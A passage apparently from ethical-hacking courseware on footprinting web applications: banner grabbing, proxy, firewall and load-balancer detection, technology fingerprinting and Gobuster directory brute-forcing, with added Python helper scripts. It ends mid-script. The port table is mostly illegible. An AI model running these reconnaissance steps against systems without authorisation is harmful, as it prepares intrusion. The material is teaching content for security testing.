- Service Discovery: Attackers can discover the services running on web servers to determine whether they can use some of them as attack paths for hacking the web application. This procedure also provides web application information such as storage location, information about the machines running the services, and the network usage and protocols involved. Attackers can use tools such as Nmap, NetScanTools Pro, and others to find services running on open ports and exploit them.
- Server Identification: Attackers use banner grabbing to obtain the server banners, which help to identify the make and version of the web server software. Other information that this technique provides includes the following:
  - Local Identity: information such as the location of the server and the Origin-Host.
  - Local Addresses: the local IP addresses that the server uses for sending Diameter Capability Exchange messages (CER/CEA messages), including the server identity, capabilities, and other information such as protocol version number and supported Diameter applications.
  - Self-Names: this field specifies all the realms that the server considers as local and treats all the requests sent for them as no-realm requests.
- Hidden Content Discovery: Footprinting also allows attackers to extract content and functionality that is not directly linked to or reachable from the main visible content.
- Load Balancers Detection: Attackers can detect load balancers of the target organization along with their real IP addresses to identify servers exposed over the Internet.
Server Discovery
To footprint a web infrastructure, first, you need to discover active Internet servers. Three techniques, namely Whois lookup, DNS interrogation, and port scanning, help in discovering the active servers and their associated information.
- Whois Lookup
Whois lookup tools allow you to gather information about a domain with the help of DNS and Whois queries. They provide information about the IP address of the web server and DNS names. These tools produce results in the form of an HTML report. Use the following tools to perform Whois lookup:
  - Netcraft (https://www.netcraft.com)
  - WHOIS Lookup (http://whois.domaintools.com)
  - SmartWhois (https://www.tamos.com)
  - Batch IP Converter (http://www.sabsoft.com)
- DNS Interrogation
Organizations use DNS, which is a distributed database, to connect their IP addresses with their respective hostnames and vice versa. When the DNS is improperly configured, then it is very easy to exploit it and gather the information required for launching an attack on a target organization. It provides information about the location and type of servers. Use the following tools to perform DNS interrogation:
  - Professional Toolset (https://tools.dnsstuff.com)
  - DNS Records (https://network-tools.com)
  - DNSRecon (https://github.com)
  - Domain Dossier (https://centralops.net)

- Port Scanning
Port scanning is the process of scanning system ports to recognize open ones. It attempts to connect to a particular set of TCP or UDP ports to find out the service that exists on the server. If attackers recognize an unused open port, they can exploit it to intrude into the system. Use the following tools to perform port scanning:
  - Nmap (https://nmap.org)
  - NetScanTools Pro (https://www.netscantools.com)
  - Advanced Port Scanner (https://www.advanced-port-scanner.com)
  - Hping (http://www.hping.org)
Service Discovery
Footprinting the web infrastructure provides data about the services offered, such as exchange of data, path of transmission, and encryption and protocols deployed. Scan the target web server to identify the common ports that it uses for different services. After finding these services, attackers can compromise them to exploit the web infrastructure that runs the application. The identified services act as attack paths for web application hacking. The table below lists common ports used by web servers and their respective HTTP services:

Port  | Typical HTTP Services
80    | World Wide Web standard port
?     | Alternate WWW
88    | Kerberos
?     | Remote Network Server System
?     | SSL (HTTPS)
?     | Remote Shell
?     | Open Directory Proxy (OD Proxy)
?     | IBM RMC (Remote Monitoring and Control) Protocol
?     | Secure Internet Live Conferencing (SILC)
?     | NETCONF for SOAP over HTTPS
?     | NETCONF for SOAP over BEEP
?     | IBM Websphere administration client
?     | Remote HTTPS management for firewall devices running embedded Check Point VPN-1 software
?     | Microsoft Remote Web Workplace, a feature of Windows Small Business Server
1433  | MS SQL Server
1434  | MS SQL Monitor
1527  | Oracle Net Services
2301  | Compaq Insight Manager
2381  | Compaq Insight Manager over SSL
2638  | SQL Anywhere Database Server
?     | Microsoft Application Center Remote management
7001  | BEA WebLogic
7002  | BEA WebLogic over SSL
7070  | Sun Java Web Server over SSL
8000  | Alternate web server or web cache
8001  | Alternate web server or management
8005  | Apache Tomcat
9090  | Sun Java Web Server admin module
10000 | Netscape Administrator interface
(? = port number not legible in the source scan)
Table 14.1: Table displaying HTTP Services
Tools used for service discovery
- Nmap
Source: https://nmap.org
Nmap is a multi-platform, multi-purpose application used to perform footprinting of ports, services, operating systems, etc. It is used for network discovery and security auditing. It is useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime.

Figure 14.39: Screenshot of Nmap

Some additional service discovery tools are as follows:
- NetScanTools Pro (https://www.netscantools.com)
- Sandcat Browser (http://www.syhunt.com)
Server Identification/Banner Grabbing
Banner grabbing is a footprinting technique used by a hacker to obtain sensitive information about a target. An attacker establishes a connection with the target and sends a pseudo-request to it. The target then replies to the request with a banner message that contains sensitive information required by the attacker to further penetrate the target. Through banner grabbing, attackers identify the name and/or version of a server, operating system, or application. They analyze the server response header field to identify the make, model, and version of the web server software. This information helps them to select the appropriate exploits from vulnerability databases to attack the web server and its applications.
How an attacker can use telnet to establish a connection and gain banner information of a target is demonstrated below:
- The attacker issues the command telnet moviescope.com 80 in his/her machine's command prompt to establish a telnet connection with the target machine.
Note: The attacker can specify either the IP address of a target machine or the URL of a website. In both cases, the attacker obtains banner information of the target. In other words, if the attacker entered an IP address, he/she receives banner information of the target machine; if he/she enters the URL of a website, he/she receives banner information of the web server that hosts the website.
Syntax:
C:\telnet <Website domain or IP address> 80

Figure 14.40: An example of telnet command usage
- After establishing the connection, the attacker receives the prompt; it does not display any information.
- Now, the attacker will press the Esc key, which returns the banner message that displays information about the target server along with some miscellaneous information.

Figure: Server identified as nginx

This information helps attackers find ways to exploit target web servers and their applications.
Grabbing Banners from SSL Services
Tools such as Telnet and Netcat are capable of grabbing banners of web servers over only an HTTP connection. Attackers cannot grab banners over an SSL connection using the same techniques as those used for grabbing banners over HTTP connections. They can use tools such as OpenSSL to grab banners on web servers over an encrypted (HTTPS/SSL) connection. Attackers perform the following steps to grab banners over an SSL connection:
- Step 1: Install OpenSSL
OpenSSL is a cryptography toolkit implementing the Secure Sockets Layer (SSL) and Transport Layer Security (TLS) network protocols and the related cryptography standards required by them. It is available at https://www.openssl.org.
- Step 2: Navigate to OpenSSL in the terminal
- Step 3: Run the command: s_client -host <target website> -port 443
Replace the <target website> with your target's domain name. Here, 443 is the default SSL port.

Figure 14.42: Example of OpenSSL command

- Step 4: Type GET / HTTP/1.0 and press enter to get the server information. The information displayed indicates that OpenSSL identifies the server used by certifiedhacker.com as Apache.

Figure 14.43: Result of OpenSSL banner grabbing
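The telnet and openssl s_client procedures above are the same exchange with and without TLS: open a socket, send a minimal request, read the Server header. The script below is an added example, not the tools' own code; grab_banner() performs a real connection, while parse_banner() is pure and is shown on a constructed response resembling the Apache result in Figure 14.43.

```python
"""Banner grabbing over plain HTTP and over TLS (the telnet and openssl cases).
Added example, not from the CEH text; SAMPLE_RESPONSE is constructed."""
import socket
import ssl
from typing import Dict, List, Optional

# Constructed response modelled on the Apache result shown in Figure 14.43.
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Date: Sat, 04 Jan 2020 15:25:15 GMT\r\n"
    b"Server: Apache\r\n"
    b"X-Powered-By: PHP/7.2\r\n"
    b"Content-Type: text/html\r\n\r\n"
    b"<html>...</html>"
)


def build_request(host: str) -> bytes:
    """HEAD keeps the reply short; HTTP/1.0 plus Connection: close makes the
    server end the exchange, as typing GET / HTTP/1.0 into s_client does."""
    return f"HEAD / HTTP/1.0\r\nHost: {host}\r\nConnection: close\r\n\r\n".encode()


def parse_banner(raw: bytes) -> Dict[str, Optional[str]]:
    """Pull the status line and the identifying headers out of a raw response."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("iso-8859-1", "replace")
    lines = head.split("\r\n")
    result: Dict[str, Optional[str]] = {
        "status": lines[0] if lines else None, "server": None, "powered_by": None}
    for line in lines[1:]:
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        name = name.strip().lower()      # header names are case-insensitive
        if name == "server":
            result["server"] = value.strip()
        elif name == "x-powered-by":
            result["powered_by"] = value.strip()
    return result


def grab_banner(host: str, port: int = 80, use_tls: bool = False,
                timeout: float = 5.0) -> Dict[str, Optional[str]]:
    """Connect (optionally inside TLS with SNI), send the request, parse the reply."""
    sock = socket.create_connection((host, port), timeout=timeout)
    try:
        if use_tls:
            # Default context keeps certificate verification on; SNI is
            # required for most virtual-hosted HTTPS servers.
            ctx = ssl.create_default_context()
            sock = ctx.wrap_socket(sock, server_hostname=host)
        sock.sendall(build_request(host))
        chunks: List[bytes] = []
        received = 0
        while received < 65536:           # a banner never needs more than this
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
            received += len(data)
        return parse_banner(b"".join(chunks))
    finally:
        sock.close()


if __name__ == "__main__":
    print(parse_banner(SAMPLE_RESPONSE))
    # Live equivalents of the telnet and openssl steps (network required):
    # print(grab_banner("certifiedhacker.com", 80))
    # print(grab_banner("certifiedhacker.com", 443, use_tls=True))
```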

Some additional banner grabbing tools are as follows:
- Netcat (http://netcat.sourceforge.net)
- ID Serve (https://www.grc.com)
- Netcraft (https://www.netcraft.com)
Detecting Web App Firewalls and Proxies on Target Site
While footprinting the web infrastructure, attackers must discover the web application firewall and proxy settings of the target site to know the security measures employed.
Detecting Proxies
Some organizations use proxy servers in front of their web servers to make them untraceable. Therefore, when attackers try to trace the target's IP address, which is hidden behind a proxy, using footprinting techniques, the attempt would provide its proxy IP address and not its legitimate address. Determine whether your target site is routing your requests through proxy servers. To know whether a web server is behind a proxy, attackers can use the trace command. The trace command sends a request to the web server, asking it to send back the request. Attackers place the trace command in HTTP/1.1. If the web server is present behind a proxy server and when an attacker sends a request using the trace command, the proxy modifies this request (by adding some headers) and forwards it to the target web server. Therefore, when the web server bounces back the request to the attacker's machine, the attacker compares both requests and analyzes the changes made to it by the proxy server.

Figure 14.44: Result of TRACE command
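The comparison step in the text (request sent versus the copy echoed in the TRACE body) is mechanical, so it is worth automating. The script below is an added example, not from the CEH material; the sent request and the TRACE response are constructed, with the proxy-inserted headers of the kind visible in Figure 14.44.

```python
"""Diff a sent request against the copy a server echoed in its TRACE body.
Added example (not CEH code); SENT_REQUEST and TRACE_RESPONSE are constructed."""
from typing import Dict, List, Tuple

# Headers that only an intermediary adds; their presence in the echo is the tell.
PROXY_HEADER_HINTS = ("via", "x-forwarded-for", "x-forwarded-host", "x-forwarded-proto",
                      "forwarded", "x-real-ip", "proxy-connection")

SENT_REQUEST = ("TRACE / HTTP/1.1\r\nHost: www.example.test\r\n"
                "User-Agent: probe\r\n\r\n")

# Constructed reply: the server echoes the request it received from the proxy.
TRACE_RESPONSE = (
    "HTTP/1.1 200 OK\r\nDate: Sat, 04 Jan 2020 15:25:15 GMT\r\n"
    "Content-Type: message/http\r\n\r\n"
    "TRACE / HTTP/1.1\r\nHost: www.example.test\r\nUser-Agent: probe\r\n"
    "Via: 1.1 proxy.example.test\r\nX-Forwarded-For: 198.51.100.7\r\n"
    "Proxy-Connection: keep-alive\r\n\r\n"
)


def parse_headers(message: str) -> Tuple[str, Dict[str, List[str]]]:
    """Split a raw HTTP message head into (start line, header multimap)."""
    lines = message.replace("\r\n", "\n").strip("\n").split("\n")
    headers: Dict[str, List[str]] = {}
    for line in lines[1:]:
        if not line.strip():
            break                      # end of the header block
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return lines[0], headers


def trace_body(response: str) -> str:
    """The echoed request is the body of the TRACE response (after the blank line)."""
    _, _, body = response.replace("\r\n", "\n").partition("\n\n")
    return body


def diff_trace(sent: str, echoed: str) -> Dict[str, object]:
    """Report headers that were added or changed between what was sent and the echo."""
    _, sent_h = parse_headers(sent)
    _, echo_h = parse_headers(echoed)
    added = {k: v for k, v in echo_h.items() if k not in sent_h}
    changed = {k: (sent_h[k], v) for k, v in echo_h.items()
               if k in sent_h and sent_h[k] != v}
    proxy_headers = sorted(k for k in added if k in PROXY_HEADER_HINTS)
    return {"added": added, "changed": changed,
            "proxy_headers": proxy_headers, "behind_proxy": bool(proxy_headers)}


if __name__ == "__main__":
    verdict = diff_trace(SENT_REQUEST, trace_body(TRACE_RESPONSE))
    print("behind proxy:", verdict["behind_proxy"], verdict["proxy_headers"])
    for name, values in verdict["added"].items():
        print("  inserted in transit:", name, values)
```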

Detecting Web Application Firewalls
Web application firewalls (WAFs) are security devices deployed between the client and the server. These devices are like IPSs that provide security for web applications against a wide range of attacks. They monitor web server traffic and block malicious traffic, thus safeguarding web applications from attacks.
Attackers use different techniques to detect web application firewalls in the web infrastructure. One of these techniques involves examining the cookies because a few WAFs add their own cookies during client-server communication. Attackers can view the HTTP request cookie to observe the presence of a WAF. Another method for detecting a WAF is by analyzing the HTTP header request. Most firewalls edit HTTP header requests; thus, the server response varies. Hence, an attacker sends a request to a web server, and when the server responds to the request, the response betrays the presence of the web application firewall.
Attackers use various tools such as WAFW00F to detect the presence of a WAF in front of a web server that hosts the target website.

- WAFW00F
Source: https://github.com
WAFW00F allows one to identify and fingerprint WAFs protecting a website. It detects a WAF at any domain by looking for the following:
  - Cookies
  - Server cloaking
  - Drop action
  - Pre-built-in rules
  - Response codes

Figure 14.45: Screenshot of WAFW00F

You can also use the tools listed below to detect WAFs in the target web infrastructure:
- SHIELDFY Web Application Firewall Detector (https://shieldfy.io)
- WhatWaf (https://github.com)
- Nmap (https://nmap.org)
Hidden Content Discovery
Hidden content and functionality not reachable from the main visible content can be discovered to exploit user privileges within the application. This allows an attacker to recover backup copies of live files, configuration files, and log files containing sensitive data, backup archives containing snapshots of files within the web root, new functionality that is not linked to the main application, etc.

The following methods are employed for discovering the hidden content:
- Web spidering/Crawling
Web spiders/crawlers automatically discover the hidden content and functionality by parsing HTML forms and client-side JavaScript requests and responses.
  - OWASP Zed Attack Proxy
Source: https://www.owasp.org
OWASP Zed Attack Proxy (ZAP) is an integrated penetration testing tool for finding vulnerabilities in web applications. It offers automated scanners as well as a set of tools that allow you to find security vulnerabilities manually. Attackers use OWASP ZAP for web spidering/crawling to identify hidden content and functionality in the target web application.

Figure 14.46: Screenshot of OWASP ZAP
Some additional web spidering/crawling tools are as follows:
- Burp Suite (https://portswigger.net)
- WebScarab (https://www.owasp.org)
- Mozenda Web Agent Builder (https://www.mozenda.com)
- Octoparse (https://www.octoparse.com)
- Giant Web Crawl (http://80legs.com)
- Attacker-Directed Spidering
The attacker accesses all of the application's functionality and uses an intercepting proxy to monitor all requests and responses. The intercepting proxy parses all of the application's responses and reports the content and functionality it discovers.
Attacker-directed spidering tools
  - OWASP Zed Attack Proxy (https://www.owasp.org)
Detect Load Balancers

Organizations use load balancers to distribute their web server load across multiple servers and thus increase the productivity and reliability of web applications. In general, there are two types of load balancers, namely DNS load balancers (layer 4 load balancers) and HTTP load balancers (layer 7 load balancers). Attackers use various tools such as dig, load balancing detector (lbd), and Halberd, to detect load balancers of the target organization along with their real IP addresses. For example, if a single host resolves to multiple IP addresses, then attackers can determine that the target organization is using load balancers.
- Using host command
Type the following host command to determine whether the target domain is resolving to multiple IP addresses:
host <target domain>

Figure 14.47: Screenshot showing output of host command
- Using dig command
The dig command provides more detailed results than the host command. Type the following dig command to determine whether the target domain is resolving to multiple IP addresses:
dig <target domain>

Figure 14.48: Screenshot showing output of dig command

- Using load balancing detector (lbd)
Source: https://github.com
lbd (load balancing detector) detects if a given domain uses DNS and/or HTTP load balancing via Server: and Date: header and diffs between server answers. It analyzes data received from application responses to detect load balancers. Type the following command to detect load balancers of the target web application:
lbd <target domain>

Figure 14.49: Screenshot showing the output of lbd tool

- Using Halberd
Source: https://github.com
You can use Halberd to identify the real IP address of load balancers. When organizations implement load balancers, their real IP address is hidden behind a virtual IP address. Once the attackers determine that the target organization is using load balancers, they try to identify the real IP address of the load balancers. Halberd can be used to discover HTTP load balancers and their IP addresses. Type the following command to identify the real IP address of the load balancers:
halberd <target domain>

Figure 14.50: Screenshot showing the output of Halberd tool

After identifying the real IP addresses behind the load balancers, attackers perform further attacks on the target organization.
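The two indicators this subsection relies on, a name resolving to several addresses (what host and dig show) and Server:/Date: headers that differ between repeated answers (what lbd diffs), can be checked with a few lines. The script below is an added example, not the tools' own code; resolve_all() does a real lookup, while the header analysis is run on constructed responses and assumes they were collected within one short burst.

```python
"""DNS (layer 4) and HTTP (layer 7) load-balancer indicators.
Added example (not lbd, dig or host code); the response samples are constructed."""
import socket
from collections import Counter
from email.utils import parsedate_to_datetime
from typing import Dict, List, Sequence

# Constructed burst of responses to the same URL, fetched seconds apart:
# two different nginx builds answer, and one backend's clock is off.
BURST = [
    {"Server": "nginx/1.18.0", "Date": "Sat, 04 Jan 2020 15:25:15 GMT"},
    {"Server": "nginx/1.16.1", "Date": "Sat, 04 Jan 2020 15:25:41 GMT"},
    {"Server": "nginx/1.18.0", "Date": "Sat, 04 Jan 2020 15:25:16 GMT"},
]
SINGLE_BACKEND = [
    {"Server": "Apache", "Date": "Sat, 04 Jan 2020 15:25:15 GMT"},
    {"Server": "Apache", "Date": "Sat, 04 Jan 2020 15:25:16 GMT"},
]


def resolve_all(domain: str) -> List[str]:
    """Every distinct A/AAAA address the system resolver returns for domain."""
    infos = socket.getaddrinfo(domain, None)
    return sorted({info[4][0] for info in infos})


def dns_balanced(addresses: Sequence[str]) -> bool:
    """More than one distinct address for one name suggests DNS balancing."""
    return len(set(addresses)) > 1


def http_balanced(responses: Sequence[Dict[str, str]],
                  max_clock_skew: float = 2.0) -> Dict[str, object]:
    """Look for per-backend differences across responses from one burst.

    Distinct Server: values, or Date: values that spread further than the
    burst itself could explain (max_clock_skew seconds), point at several
    backends behind one virtual IP.
    """
    lower = [{k.lower(): v for k, v in r.items()} for r in responses]
    servers = Counter(r.get("server", "<absent>").strip() for r in lower)
    dates = [parsedate_to_datetime(r["date"]) for r in lower if "date" in r]
    spread = (max(dates) - min(dates)).total_seconds() if len(dates) > 1 else 0.0
    distinct = sorted(servers)
    reasons: List[str] = []
    if len(distinct) > 1:
        reasons.append(f"{len(distinct)} different Server values: {distinct}")
    if spread > max_clock_skew:
        reasons.append(f"Date headers spread over {spread:.0f}s within one burst")
    return {"distinct_servers": distinct, "date_spread_seconds": spread,
            "reasons": reasons, "balanced": bool(reasons)}


if __name__ == "__main__":
    print(http_balanced(BURST))
    print(http_balanced(SINGLE_BACKEND))
    # Live DNS check (network required), the host/dig step:
    # addrs = resolve_all("example.test"); print(addrs, dns_balanced(addrs))
```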

Analyze Web Applications


Once attackers have attempted various possible attacks on a vulnerable web server, they may turn their attention to the web application itself. To hack the web application, first, they may need to analyze it to determine its vulnerable areas. Even if it has only a single vulnerability, attackers try to compromise its security by launching an appropriate attack. This section describes how attackers find vulnerabilities in a web application and exploit them.
Attackers need to analyze target web applications to determine their vulnerabilities. Doing so helps them reduce the "attack surface." To analyze a web application, attackers acquire basic knowledge of the web application. Then, they can analyze the active application's functionality and technologies to identify any exposed attack surfaces.
- Identify Entry Points for User Input: The first step in analyzing a web application is to check for the application entry point, which can later serve as a gateway for attacks. One of the entry points includes the front-end web application that intercepts HTTP requests. Other web application entry points are user interfaces provided by web pages, service interfaces provided by web services, serviced components, and .NET Remoting components. Attackers should review the generated HTTP request to identify the user input entry points.
- Identify Server-Side Technologies: Server-side technologies or server-side scripting systems are used to generate dynamic web pages requested by clients, and they are stored internally on the server. The server allows the running of interactive web pages or websites on web browsers. Commonly used server-side technologies include Active Server Pages (ASP), ASP.NET, ColdFusion, JavaServer Pages (JSP), PHP, Python, and Ruby on Rails. Attackers can fingerprint the technologies active on the server using various fingerprint techniques such as HTTP fingerprinting.
- Identify Server-Side Functionality: Server-side functionality refers to the ability of a server to execute programs on output web pages. User requests stimulate the scripts residing on the web server to display interactive web pages or websites. The server executes server-side scripts, which are invisible to the user. Attackers should evaluate the server-side structure and functionality by keenly observing the applications revealed to the client.
- Identify Files and Directories: Web servers host web applications, and misconfigurations while hosting these web applications may lead to exposure of critical files and directories over the Internet. Attackers identify the target web application's files and directories exposed on the Internet using various automated tools such as Gobuster. Such information further helps attackers gather sensitive information stored in the files and folders.
- Identify Web Application Vulnerabilities: Web applications are developed using various technologies and platforms. Not following secure coding practices in the development of web applications may leave flaws that can be exploited to perform various types of attacks.
- Map the Attack Surface: Attackers then map the attack surface of the web application to target specific vulnerable areas. They identify the various attack surfaces uncovered by the applications as well as the vulnerabilities associated with them.
Identify Entry Points for User Input
Web application input gates help attackers launch various types of injection attacks on the application. If such input gates are vulnerable to attacks, gaining access to the application is easy. Thus, during web application analysis, attackers try to identify entry points for user input so that they can understand how the web application accepts or handles the user input. Attackers examine the URL, HTTP header, query string parameters, POST data, and cookies to determine all the user input fields. They also identify HTTP header parameters that can be processed by the application as user inputs, such as User-Agent, Referer, Accept, Accept-Language, and Host. Furthermore, they determine URL encoding techniques and other encryption measures implemented to secure web traffic, such as SSL. Then, they can find the vulnerabilities present in the input mechanism and exploit them to gain access to the web application.
Use the following tools to analyze the web application:
- Burp Suite (https://portswigger.net)
- WebScarab (https://www.owasp.org)
- OWASP Zed Attack Proxy (https://www.owasp.org)

- httprint (https://www.net-square.com)
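Applied to one captured request, the inventory described above (query string, POST data, cookies, and the headers the application may process as input) is a short parsing job, and the same list is what a reviewer would test for reflection or injection. The script below is an added example, not from the CEH material; the request is constructed and the header list is the one the text gives.

```python
"""Enumerate user-controlled entry points in one raw HTTP request.
Added example (not CEH code); SAMPLE_REQUEST is constructed."""
from typing import Dict, List
from urllib.parse import parse_qsl, urlsplit

# Request headers the text lists as inputs the application may process.
INPUT_HEADERS = ("user-agent", "referer", "accept", "accept-language", "host")

# Constructed login request carrying every kind of entry point at once.
SAMPLE_REQUEST = (
    "POST /login?next=%2Faccount&lang=en HTTP/1.1\r\n"
    "Host: www.moviescope.com\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "Accept: text/html\r\n"
    "Accept-Language: en-US\r\n"
    "Referer: https://www.moviescope.com/\r\n"
    "Cookie: PHPSESSID=abc123; theme=dark\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 30\r\n\r\n"
    "username=alice&password=s3cret"
)


def entry_points(raw_request: str) -> List[Dict[str, str]]:
    """Return one {"location", "name", "value"} record per user-controlled field."""
    head, _, body = raw_request.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    _method, target, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()

    points: List[Dict[str, str]] = []
    # 1. query string parameters (URL-decoded, blanks kept: they are inputs too)
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        points.append({"location": "query", "name": name, "value": value})
    # 2. POST data: form-encoded bodies are split into fields, anything else is
    #    one opaque input (JSON, XML, multipart) that still reaches the application
    ctype = headers.get("content-type", "")
    if body and ctype.startswith("application/x-www-form-urlencoded"):
        for name, value in parse_qsl(body.strip(), keep_blank_values=True):
            points.append({"location": "body", "name": name, "value": value})
    elif body:
        points.append({"location": "body", "name": ctype or "raw", "value": body.strip()})
    # 3. cookies
    for cookie in headers.get("cookie", "").split(";"):
        if "=" in cookie:
            name, value = cookie.strip().split("=", 1)
            points.append({"location": "cookie", "name": name, "value": value})
    # 4. headers the server-side code may read as input
    for h in INPUT_HEADERS:
        if h in headers:
            points.append({"location": "header", "name": h, "value": headers[h]})
    return points


def count_by_location(points: List[Dict[str, str]]) -> Dict[str, int]:
    counts: Dict[str, int] = {}
    for p in points:
        counts[p["location"]] = counts.get(p["location"], 0) + 1
    return counts


if __name__ == "__main__":
    found = entry_points(SAMPLE_REQUEST)
    for p in found:
        print(f"{p['location']:7} {p['name']} = {p['value']!r}")
    print(count_by_location(found))
```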
Identify Server-Side Technologies
- Perform detailed fingerprinting and analyze the HTTP headers and HTML source code to identify server-side technologies
- Examine URLs for file extensions, directories, and other identification information
- Examine the error page messages
- Examine session tokens: JSESSIONID - Java, ASPSESSIONID - IIS server, ASP.NET_SessionId - ASP.NET, PHPSESSID - PHP
- Use tools such as httprint and WhatWeb to identify server-side technologies

Figure 14.51: Screenshot displaying an error message (an ASP.NET "Server Error in '/ReportServer' Application" page whose description reports an unhandled exception and whose version information line discloses the .NET Framework version)

httprint

Source: https://www.net-square.com

httprint is a web server fingerprinting tool that relies on web server characteristics to accurately identify web servers, even though they may have been obfuscated by changing the server banner strings or by plug-ins such as mod_security or ServerMask. httprint can also be used to detect web-enabled devices that do not have a server banner string, such as wireless access points, routers, switches, and cable modems. httprint uses text signature strings, and it is very easy to add signatures to the signature database.

Figure 14.52: Screenshot of httprint
WhatWeb

Source: https://github.com

WhatWeb scans and identifies web technologies, including content management systems (CMS), blogging platforms, statistic/analytics packages, JavaScript libraries, web servers, and embedded devices. WhatWeb has over 1800 plugins, each of which recognizes something different. WhatWeb also identifies version numbers, email addresses, account IDs, web framework modules, SQL errors, and more.

Figure 14.53: Screenshot showing WhatWeb output

Identify Server-Side Functionality

After determining the server-side technologies, attackers try to identify the server-side functionality to find potential vulnerabilities. They examine the page source and URLs and make educated guesses to determine the internal structure and functionality of web applications. They use the following tools to do so.
- GNU Wget
  Source: https://www.gnu.org
  GNU Wget is employed for retrieving files using HTTP, HTTPS, and FTP, which are the most widely used Internet protocols. It is a non-interactive command-line tool; hence, it can be called from scripts, cron jobs, and terminals without X-Windows support.

  Figure 14.54: Screenshot displaying the GNU Wget command-line utility tool

- BlackWidow (http://softbytelabs.com)
- Teleport Pro (http://www.tenmax.com)
Examine URL

An SSL-certified page URL starts with https instead of http. If a page has an .aspx extension, the application is likely written using ASP.NET. If the query string has a parameter named showBy and the page displays the data ordered by that value, then you can assume that the application is using a database.
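The clues described in the two passages above (session cookie names, Server and X-Powered-By headers, file extensions, the https scheme) can be collected automatically. The following script is an added example, not courseware code and not the code of httprint or WhatWeb; the indicator tables are an assumed mapping built from what the text lists, and the sample response is constructed rather than captured from a real host:

```python
"""Passive server-side technology fingerprinting from a URL and an HTTP response.

Added example, not from the courseware or any tool it names: the indicator
tables below are an assumption-based mapping of the clues this section lists
(session cookie names, Server and X-Powered-By headers, URL file extensions,
the https scheme), and the sample response is constructed, not captured.
"""
import posixpath
from urllib.parse import urlparse

# Session cookie names that betray the platform (from the text).
COOKIE_INDICATORS = {
    "JSESSIONID": "Java servlet container",
    "ASPSESSIONID": "Classic ASP on IIS",
    "ASP.NET_SESSIONID": "ASP.NET",
    "PHPSESSID": "PHP",
}
# File extensions that hint at the framework behind a page (assumed mapping).
EXTENSION_INDICATORS = {
    ".aspx": "ASP.NET", ".asp": "Classic ASP", ".php": "PHP",
    ".jsp": "Java (JSP)", ".do": "Java (Struts)", ".cfm": "ColdFusion",
}


def parse_headers(raw_response: str):
    """Return [(name_lower, value), ...] from a raw HTTP response head."""
    head = raw_response.split("\r\n\r\n", 1)[0]
    headers = []
    for line in head.split("\r\n")[1:]:          # skip the status line
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return headers


def fingerprint(url: str, raw_response: str) -> dict:
    """Collect technology clues from the URL and the response headers."""
    clues = {}
    for name, value in parse_headers(raw_response):
        if name == "server":
            clues["server_banner"] = value
        elif name == "x-powered-by":
            clues["x_powered_by"] = value
        elif name == "set-cookie":
            cookie = value.split("=", 1)[0].strip()
            # ASPSESSIONID carries a random suffix (e.g. ASPSESSIONIDQGQQGFOC), so match on prefix.
            for prefix, tech in COOKIE_INDICATORS.items():
                if cookie.upper().startswith(prefix):
                    clues.setdefault("session_cookie", []).append((cookie, tech))
    parsed = urlparse(url)
    ext = posixpath.splitext(parsed.path.lower())[1]
    if ext in EXTENSION_INDICATORS:
        clues["extension"] = (ext, EXTENSION_INDICATORS[ext])
    clues["tls"] = parsed.scheme == "https"
    return clues


# Constructed sample (not a real capture).
SAMPLE_URL = "https://shop.example.test/catalog/list.aspx?showBy=price"
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Microsoft-IIS/10.0\r\n"
    "X-Powered-By: ASP.NET\r\n"
    "Set-Cookie: ASP.NET_SessionId=abc123; path=/; HttpOnly\r\n"
    "Set-Cookie: ASPSESSIONIDQGQQGFOC=XYZ; path=/\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
    "<html>...</html>"
)

if __name__ == "__main__":
    for clue, value in fingerprint(SAMPLE_URL, SAMPLE_RESPONSE).items():
        print(f"{clue}: {value}")
```

The Server banner is the least reliable of these clues, since it is trivially changed (which is why httprint relies on behavioural signatures instead); cookie names and file extensions are usually left at their framework defaults.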

Figure 14.55: Identify server-side functionality by examining the URL

Identify Files and Directories

Attackers use various techniques and tools to enumerate applications, hidden directories, and files of the web application hosted on web servers that are exposed on the Internet. They use tools such as Gobuster, URL Fuzzer, and the Nmap NSE script http-enum to identify files and directories of the target web application.

Gobuster

Source: https://github.com

Gobuster is a Go-based directory scanner that allows attackers to perform fast-paced enumeration of hidden files and directories of a target web application. It is a command-line tool used to brute-force URIs in websites, DNS subdomains, names of virtual hosts on the target server, etc.

Run the following command to retrieve file and directory names and their status codes:

  gobuster -u <target URL> -w common.txt

(In Gobuster 3.x the mode is given as a subcommand, so the equivalent is gobuster dir -u <target URL> -w common.txt; the flags below are the same.)

Figure 14.56: Screenshot showing the output of Gobuster

Use the -l flag to retrieve the length of the body along with files and directories:

  gobuster -u <target URL> -w common.txt -l
  .htpasswd (Status: 403) [Size: 410]
  .htaccess (Status: 403) [Size: 410]

Figure 14.57: Screenshot showing the output of the Gobuster tool

Use the -s flag to retrieve files and directories related to specific status codes:

  gobuster -u <target URL> -w common.txt -s 200

Figure 14.58: Screenshot showing the output of the Gobuster tool

Similarly, the -q and -n flags provide a quick view of the directories without the banner and status codes. You can also write the results to an output file using the -o flag.
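To make concrete what Gobuster's output lines mean, here is an added example (not Gobuster's code and not from the courseware) that brute-forces a wordlist against a throwaway local HTTP server and reports each hit the way the -l flag does, with an optional status filter like -s. The server, its paths and the wordlist are all constructed here so the script runs offline:

```python
"""Minimal Gobuster-style directory brute-forcer against a local stand-in server.

Added example, not Gobuster's own code: it reproduces what the flags in this
section report, i.e. the path and status code of each hit (default), the body
length (-l) and a status-code filter (-s). To run offline it starts a throwaway
HTTP server whose paths and responses are constructed below; point it at a real
target only with authorization.
"""
import threading
from concurrent.futures import ThreadPoolExecutor
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer
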